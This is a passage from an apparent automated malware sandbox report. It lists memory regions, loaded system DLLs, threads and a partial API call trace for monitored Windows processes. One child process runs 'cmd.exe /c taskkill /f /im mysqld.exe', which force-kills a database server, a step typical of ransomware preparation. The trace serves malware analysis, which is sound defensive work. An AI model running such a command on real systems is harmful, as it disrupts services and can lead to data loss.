= 0x70000 end_va = 0x406ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 3415 start_va = 0x4070000 end_va = 0x4084fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004070000" filename = "" Region: id = 3416 start_va = 0x4090000 end_va = 0x40cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 3417 start_va = 0x40d0000 end_va = 0x410ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040d0000" filename = "" Region: id = 3418 start_va = 0x4110000 end_va = 0x4110fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004110000" filename = "" Region: id = 3419 start_va = 0x4120000 end_va = 0x4121fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 3420 start_va = 0x4200000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 3421 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3422 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3423 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3424 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3425 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 3426 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3427 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 3428 start_va = 0x4510000 end_va = 0x451ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004510000" filename = "" Region: id = 3429 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3430 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3431 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3432 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3433 start_va = 0x4520000 end_va = 0x47cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004520000" filename = "" Region: id = 3434 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3435 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3436 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3437 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3438 start_va = 0x4130000 end_va = 0x41edfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3439 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3440 start_va = 0x74650000 end_va = 0x746cafff monitored = 0 entry_point = 0x7466e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3441 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3442 start_va = 0x4400000 end_va = 0x443ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 3443 start_va = 0x4440000 end_va = 0x447ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004440000" filename = "" Region: id = 3444 start_va = 0x76ae0000 end_va = 0x76b23fff monitored = 0 entry_point = 0x76af9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3445 start_va = 0x75260000 end_va = 0x7530cfff monitored = 0 entry_point = 0x75274f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3446 start_va = 0x74450000 end_va = 0x7446dfff monitored = 0 entry_point = 0x7445b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3447 start_va = 0x74440000 end_va = 0x74449fff monitored = 0 entry_point = 0x74442a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3448 start_va = 0x74590000 end_va = 0x745e7fff monitored = 0 entry_point = 0x745d25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3449 start_va = 0x77450000 end_va = 0x77596fff monitored = 0 entry_point = 0x77461cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3450 start_va = 0x76b30000 end_va = 0x76c7efff monitored = 0 entry_point = 0x76be6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3451 start_va = 0x753c0000 end_va = 0x75451fff monitored = 0 entry_point = 0x753f8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 3452 start_va = 0x77290000 end_va = 0x7744cfff monitored = 0 entry_point = 0x77372a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3453 start_va = 0x75310000 end_va = 0x7536efff monitored = 0 entry_point = 0x75314af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 3454 start_va = 0x77240000 end_va = 0x77284fff monitored = 0 entry_point = 0x7725de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 3455 start_va = 0x6cda0000 end_va = 0x6cda7fff monitored = 0 entry_point = 0x6cda17b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 3456 start_va = 0x6cd80000 end_va = 0x6cd95fff monitored = 0 entry_point = 0x6cd821d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 3457 start_va = 0x6ccb0000 end_va = 0x6cceefff monitored = 0 entry_point = 0x6ccc46c0 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 3458 start_va = 0x6c9a0000 end_va = 0x6cadefff monitored = 0 entry_point = 0x6c9cd880 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 3459 start_va = 0x6cd70000 end_va = 0x6cd79fff monitored = 0 entry_point = 0x6cd728d0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 3460 start_va = 0x6cd50000 end_va = 0x6cd6bfff monitored = 0 entry_point = 0x6cd54720 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 3461 start_va = 0x4520000 end_va = 0x463ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004520000" filename = "" Region: id = 3462 start_va = 0x46d0000 end_va = 0x47cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046d0000" filename = "" Region: id = 3463 start_va = 0x4480000 end_va = 0x44a9fff monitored = 0 entry_point = 0x4485680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3464 start_va = 0x47d0000 end_va = 0x4957fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000047d0000" filename = "" Region: id = 3465 start_va = 0x74ea0000 end_va = 0x74ecafff monitored = 0 entry_point = 0x74ea5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3466 start_va = 0x4960000 end_va = 0x4ae0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004960000" filename = "" Region: id = 3467 start_va = 0x4af0000 end_va = 0x5eeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004af0000" filename = "" Region: id = 3468 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3469 start_va = 0x41f0000 end_va = 0x41f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000041f0000" filename = "" Region: id = 3470 start_va = 0x4480000 end_va = 0x4484fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui") Region: id = 3471 start_va = 0x4490000 end_va = 0x4490fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004490000" filename = "" Region: id = 3472 start_va = 0x44a0000 end_va = 0x44a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044a0000" filename = "" Region: id = 3473 start_va = 0x5ef0000 end_va = 0x6226fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3474 start_va = 0x4520000 end_va = 0x4609fff monitored = 0 entry_point = 0x455d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 3475 start_va = 0x4630000 end_va = 0x463ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004630000" filename = "" Region: id = 3476 start_va = 0x44b0000 end_va = 0x44b3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044b0000" filename = "" Region: id = 3477 start_va = 0x4520000 end_va = 0x45fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 3478 start_va = 0x76e20000 end_va = 0x76e2bfff monitored = 0 entry_point = 0x76e23930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 3479 start_va = 0x44c0000 end_va = 0x44c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044c0000" filename = "" Region: id = 3480 start_va = 0x76c80000 end_va = 0x76d03fff monitored = 0 entry_point = 0x76ca6220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 3481 start_va = 0x44d0000 end_va = 0x44d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044d0000" filename = "" Region: id = 3482 start_va = 0x6cca0000 end_va = 0x6ccacfff monitored = 0 entry_point = 0x6cca3520 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 3483 start_va = 0x6cc30000 end_va = 0x6cc96fff monitored = 0 entry_point = 0x6cc4b610 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 3484 start_va = 0x740f0000 end_va = 0x7410afff monitored = 0 entry_point = 0x740f9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 3485 start_va = 0x6cbe0000 end_va = 0x6cc23fff monitored = 0 entry_point = 0x6cbfaaf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 3486 start_va = 0x4640000 end_va = 0x467ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004640000" filename = "" Region: id = 3487 start_va = 0x4680000 end_va = 0x46bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004680000" filename = "" Region: id = 3488 start_va = 0x6230000 end_va = 0x626ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006230000" filename = "" Region: id = 3489 start_va = 0x6270000 end_va = 0x62affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006270000" filename = "" Region: id = 3490 start_va = 0x62b0000 end_va = 0x62effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000062b0000" filename = "" Region: id = 3491 start_va = 0x62f0000 end_va = 0x632ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000062f0000" filename = "" Region: id = 3492 start_va = 0x6cbc0000 end_va = 0x6cbd0fff monitored = 0 entry_point = 0x6cbc8fa0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 3493 start_va = 0x6c8e0000 end_va = 0x6c99efff monitored = 0 entry_point = 0x6c911e80 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 3495 start_va = 0x44e0000 end_va = 0x44e5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044e0000" filename = "" Thread: id = 251 os_tid = 0x1260 Thread: id = 252 os_tid = 0x1200 Thread: id = 253 os_tid = 0x2c8 Thread: id = 254 os_tid = 0x12ac Thread: id = 255 os_tid = 0x634 Process: id = "46" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x50cd8000" os_pid = "0x1280" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x110c" cmd_line = "cmd.exe /c \"taskkill /f /im mysqld.exe \"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3498 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3499 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3500 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3501 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3502 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3503 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3504 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3505 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3506 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3507 start_va = 0xf10000 end_va = 0xf61fff monitored = 1 entry_point = 0xf24fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 3508 start_va = 0xf70000 end_va = 0x4f6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f70000" filename = "" Region: id = 3509 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3510 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3511 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3512 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3513 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 3514 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3515 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 3516 start_va = 0x430000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 3517 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3518 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3519 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3520 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3521 start_va = 0x440000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 3522 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3523 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3524 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3525 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3526 start_va = 0x440000 end_va = 0x4fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3527 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 3528 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3529 start_va = 0x500000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 3530 start_va = 0x6c0000 end_va = 0x7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 3531 start_va = 0x7c0000 end_va = 0x98ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 3532 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3533 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3534 start_va = 0x990000 end_va = 0xcc6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 256 os_tid = 0xeb0 [0186.937] GetModuleHandleA (lpModuleName=0x0) returned 0xf10000 [0186.937] __set_app_type (_Type=0x1) [0186.937] __p__fmode () returned 0x74974d6c [0186.937] __p__commode () returned 0x74975b1c [0186.937] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf25200) returned 0x0 [0186.937] __getmainargs (in: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0, _DoWildCard=0, _StartInfo=0xf360fc | out: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0) returned 0 [0186.938] GetCurrentThreadId () returned 0xeb0 [0186.938] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xeb0) returned 0x78 [0186.938] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0186.938] GetProcAddress (hModule=0x75600000, lpProcName="SetThreadUILanguage") returned 0x75642510 [0186.939] SetThreadUILanguage (LangId=0x0) returned 0x409 [0186.947] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0186.947] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0186.948] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0186.948] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0186.948] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0186.948] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0186.948] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0186.948] GetConsoleOutputCP () returned 0x1b5 [0186.951] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0186.952] SetConsoleCtrlHandler (HandlerRoutine=0xf30e40, Add=1) returned 1 [0186.952] _get_osfhandle (_FileHandle=1) returned 0x154 [0186.952] SetConsoleMode (hConsoleHandle=0x154, dwMode=0x0) returned 0 [0186.952] _get_osfhandle (_FileHandle=1) returned 0x154 [0186.952] GetConsoleMode (in: hConsoleHandle=0x154, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0186.952] _get_osfhandle (_FileHandle=0) returned 0x144 [0186.952] GetConsoleMode (in: hConsoleHandle=0x144, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0186.952] GetEnvironmentStringsW () returned 0x5c7cc0* [0186.952] GetProcessHeap () returned 0x5c0000 [0186.952] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0xa1a) returned 0x5c86e8 [0186.953] FreeEnvironmentStringsA (penv="A") returned 1 [0186.953] GetProcessHeap () returned 0x5c0000 [0186.953] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x4) returned 0x5c0550 [0186.953] GetEnvironmentStringsW () returned 0x5c7cc0* [0186.953] GetProcessHeap () returned 0x5c0000 [0186.953] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0xa1a) returned 0x5c9110 [0186.953] FreeEnvironmentStringsA (penv="A") returned 1 [0186.953] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0186.953] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0186.953] RegQueryValueExW 